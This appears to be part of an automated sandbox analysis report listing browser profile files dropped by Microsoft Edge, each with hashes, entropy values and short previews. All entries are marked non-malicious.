                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.44194574462308833
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                        SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                        SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                        SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):352
                                                        Entropy (8bit):5.129659175570171
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F707F002DE4EB59F10D044EE2BDE025B
                                                        SHA1:58B0D0E01EDEDC5E19F021E2B70A808543466512
                                                        SHA-256:20D064F12C1DDDAC57BD34E36672DB02555689D742C25C5C10997AF30CD279BF
                                                        SHA-512:CA8D2819CC39C510ECB71EB0B275CC58030CC067B429BAC62927635B9E3E3058479D0302F304CF9F6A6699EBDB5C86F3863D3BAAE1CE54B08E26870340C2EBC6
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:08.151 1578 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/10/31-06:13:08.153 1578 Recovering log #3.2024/10/31-06:13:08.153 1578 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):270336
                                                        Entropy (8bit):0.0012471779557650352
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):434
                                                        Entropy (8bit):5.215283590431461
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:8C1652425E01C5040E164DA519DD24D6
                                                        SHA1:A956480E716F0E022D5A8EDF5D47A3D8FD5ED597
                                                        SHA-256:22C10237A2200B2E100DF3FBFC4BC3669F42EDA7D40E2F7462C7736807F1EC05
                                                        SHA-512:10FD197A9918EEFB51726D3DD5380B897527D01A17D9E425E50B4C6C4CD69140955C275C973B83EAA77B14E15C73DEA112CB98E3BB877110D2E825103F17D2A0
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:08.751 1ee8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/10/31-06:13:08.754 1ee8 Recovering log #3.2024/10/31-06:13:08.764 1ee8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\788e788d-38bd-48ee-b470-57ddb2bb46a9.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):40
                                                        Entropy (8bit):4.1275671571169275
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:807419CA9A4734FEAF8D8563A003B048
                                                        SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                        SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                        SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\d6161745-3d7b-44dd-abd9-a7f517121781.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):111
                                                        Entropy (8bit):4.718418993774295
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:807419CA9A4734FEAF8D8563A003B048
                                                        SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                        SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                        SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):80
                                                        Entropy (8bit):3.4921535629071894
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:69449520FD9C139C534E2970342C6BD8
                                                        SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                        SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                        SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:*...#................version.1..namespace-..&f.................&f...............

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):422
                                                        Entropy (8bit):5.211776876587914
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:AA10CC105427CFB2C758FDF2801DA48E
                                                        SHA1:0C6BCCCB16EB1616688A9A89E34D9E7692CB4303
                                                        SHA-256:58951CCD0CF2BFE16D048A81ECEE67993806C0AD4B5E0C3E460B6E561BB70378
                                                        SHA-512:CDFFFB5CF0DC641D27B837C5D7054936BA4F83617E2F4EE44A350C8826EDE171E19816A15A3C09E18405EA763C4DF40B25329FF45A30339DB63500E008A5DE4E
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:24.558 1ee8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/10/31-06:13:24.607 1ee8 Recovering log #3.2024/10/31-06:13:24.611 1ee8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):328
                                                        Entropy (8bit):5.151819043518332
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:C00A809A11518714D7B02702CB1A6270
                                                        SHA1:4B5ACB9F2B906321B866C58B6BAB9CDB1FBCE2DA
                                                        SHA-256:54673482EA84D63F5506601D293A115D6390CA23DB2D1C6EC18E46392108BD7F
                                                        SHA-512:1AF9CDB36CA6EEB7D76B8F5051766BF76C5A6F344E0752227687571D7F4E1495524742A1DC84A4C6EA6B86A7EB24A45E1A2786D0F2B0D35CDAEA52DE0782056D
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:08.172 1fec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/10/31-06:13:08.173 1fec Recovering log #3.2024/10/31-06:13:08.173 1fec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 11, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 11
                                                        Category:dropped
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.265168083842445
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:AFD90AE3591B184BE685B05AFF0C3E75
                                                        SHA1:32778871CE908BFA7CD646240A9A79F3EE3A8006
                                                        SHA-256:314289B0AB8A8719341F087C39AD01E4F2E3C5C2A241B8CE99709D628856EB3B
                                                        SHA-512:53EFD385A87152063F2C2336D5F5CAB3B159EB0345FFA63E1BBC72EA9AFE179CF8492CB386C66ACA9061A6C322D6E06C39594711AB65ECCF7121A58CEFC01689
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):11755
                                                        Entropy (8bit):5.190465908239046
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:07301A857C41B5854E6F84CA00B81EA0
                                                        SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                        SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                        SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c783db2c-8ead-4971-a5e2-b214819d6df0.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):10518
                                                        Entropy (8bit):5.172374795457462
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:FDE4E0A3C46F7ED409B631CC442534D1
                                                        SHA1:1EC1FA4C9347680BC7DAF73C809C96E772CF7E06
                                                        SHA-256:8EFCB10B29E64BE4A7EF07D451E381D5CF21FF95E914C4C42EA8076E9A82D5E8
                                                        SHA-512:EE4F7B4275A4FDA23B8480896F9587C08072425CFD09C27C369AED908DAF42FC709E6F627791BE7A85487978C17D9EC912A3FB19DF9D3DC47B9C2C88FDDE5221
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13374843188609672","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"collections":{"prism_collections":{"enabled":0,"policy":{"cached":2}},"rss_dev_feed":{"policy":{"cached":false}}},"continuous_migration":{"ci_correction_for_holdout_treatm

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f4fe0428-8038-4994-a572-ee17524d1dde.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):28366
                                                        Entropy (8bit):5.55707323739789
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:9DBBF73ABA36549E1F1784A748A9FBF3
                                                        SHA1:4988D673979805C1B24FB4D3881D546B93EA9C93
                                                        SHA-256:D0C09D8DC03B0436A6370919BCA0892C02758397EA533A686B0B3815F6E66AD2
                                                        SHA-512:387529ABDE0DE8377FC1D092BC374301BDBD6AE27BB92377D11702493F352A3667948862C246982E85E3B2D8E1F13E0A414909797169BC7911C1EA6532369094
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13374843188169105","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13374843188169105","location":5,"ma

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):0.049509175270688155
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:1E0B702A32D1754A8BE8D88138F22FBE
                                                        SHA1:39B2A4AE6AF3D9A25DCCA655DE2D31721C06F3ED
                                                        SHA-256:9328DEB5EDB26A1FFB4DD52E0106F8095D2858F7E461008E3326B517F4B45AA4
                                                        SHA-512:D1C2924773CB6145B13C643866767331934C381CEB54F96D7114B21FA86055FC1966BD809DC908E2C42E7E1811B1D85D695D220767B4BADF4C9D24AD9CC781CA
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:..-...........................x.o....[5wV.!.....-...........................x.o....[5wV.!...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6457
                                                        Entropy (8bit):5.619016318554381
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:64F30A0876D9C28BBC7F80092A5897F8
                                                        SHA1:D078A84CC9816D43D5022B2248A00BF2F0B38784
                                                        SHA-256:05974C8A3CA2CD1CC5CA9194A7A30B4E793083435D8D458FEC24DCD23B6650E9
                                                        SHA-512:345D4E62F9A4B78F957FA74CC08D416859EE006594B79F64024CB9545C5AA23B051F4CE5ED83789781475E40349E72E98CB60AFE5B7EAF3E671CC528411676D7
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:A..r.................20_1_1...1.,U.................20_1_1...1..&f.................&f.................s.0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=................wG.................021_download,cd3bbbb3-915e-43d2-862e-8c58d9a5951c......$cd3bbbb3-915e-43d2-862e-8c58d9a5951c................."...2file:///C:/Users/user/Downloads/Drawing%201.vsdx.."2file:///C:/Users/user/Downloads/Drawing%201.vsdx*.0.B.J.P...Z.application/vnd.ms-visio.viewerb.application/vnd.ms-visio.viewerj.........r.........x..................................................................................... .KR.................021_download,cd3bbbb3-915e-43d2-862e-8c58d9a5951c......$cd3bbbb3-915e-43d2-862e-8c58d9a5951c................."...2file:///C:/Users/to

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):324
                                                        Entropy (8bit):5.183971593744991
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:A740512960816639D7C937779938B4C4
                                                        SHA1:4260F11BE9462492E67066C0FAD3251E7BC4D780
                                                        SHA-256:0F0D4AE4C0CDFFD9204927E58FFCEB539830222CE4B46FFCF5020F925AAF153A
                                                        SHA-512:218362287B5B728ABF76D40D66DB39146D5857C29E8B752552305686E81DD81287FC6CF0C4B33CA1A6E1AD4812A23015C7C7E6B9FD8FFFEB48D76057F3D163F4
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:08.616 1cf4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/10/31-06:13:08.617 1cf4 Recovering log #3.2024/10/31-06:13:08.617 1cf4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):821
                                                        Entropy (8bit):4.0448338863188615
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:779E5DACEF226AC699FE40BF126500A3
                                                        SHA1:8B2A479A2C00008C424C9F58D9F0ACF81DB3025F
                                                        SHA-256:7AE3C20095E88D1D03F6348C32E8640E63393A39FA3E6465B5022922C8953D83
                                                        SHA-512:B601168785A98E67F69B958F5C5DC4C74F057E84E7407DA75F5BF8683FA1667033CF73E88E687C1E94C50FDA89B40BB93282FDD512C506A9FC4AFCFB149ED331
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_......Q...................20_.......w<.................20_.......ln.................19_......Y...................18_.....%.{..................9_.....f..U.................9_..........................37_.....9 '<.................38_........J.................39_.....I.Ha.................37_......m.}.................38_..........................39_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):342
                                                        Entropy (8bit):5.1489833823944124
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:1DE528EAF608F67369EA5D2CB0CC726B
                                                        SHA1:97E27F93A635D890DD243E1825B00BE89DE6F71A
                                                        SHA-256:3835091770896CC5CCAFC51F20D3F0EB8A6A389AAB9465AE2DC18068BA243CDD
                                                        SHA-512:006AE5B9E139773E4367A02571B1DFA42AD69585EB9CBCF934CEF1B2B8D78F55020BDE020032B87F5A96B3610A06E236368F6C08D5672005E00130FD70C166C3
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:2024/10/31-06:13:08.611 1cf4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/10/31-06:13:08.612 1cf4 Recovering log #3.2024/10/31-06:13:08.613 1cf4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):120
                                                        Entropy (8bit):3.32524464792714
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:A397E5983D4A1619E36143B4D804B870
                                                        SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                        SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                        SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):13
                                                        Entropy (8bit):2.7192945256669794
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                        SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                        SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                        SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:117.0.2045.47

                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):0
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:7321CC75A7C96F53148F42704EBA627E
                                                        SHA1:497C0E503C7CCA42F2FCBB4E9EB38996429387AF
                                                        SHA-256:D1E700AE8E09A9D0054D20A4A80149D47E7E8935A756C5145AB0A5A05FC7196D
                                                        SHA-512:452D6C03AA8A982FFB658A2357990875A302CC978E7DFBA894B02CACE77CDFABB495DE20F451623B4E5C91A29BB1A184CEB17853CDB3CDE840D7C5B91635527B
                                                        Malicious:false
                                                        Reputation:unknown
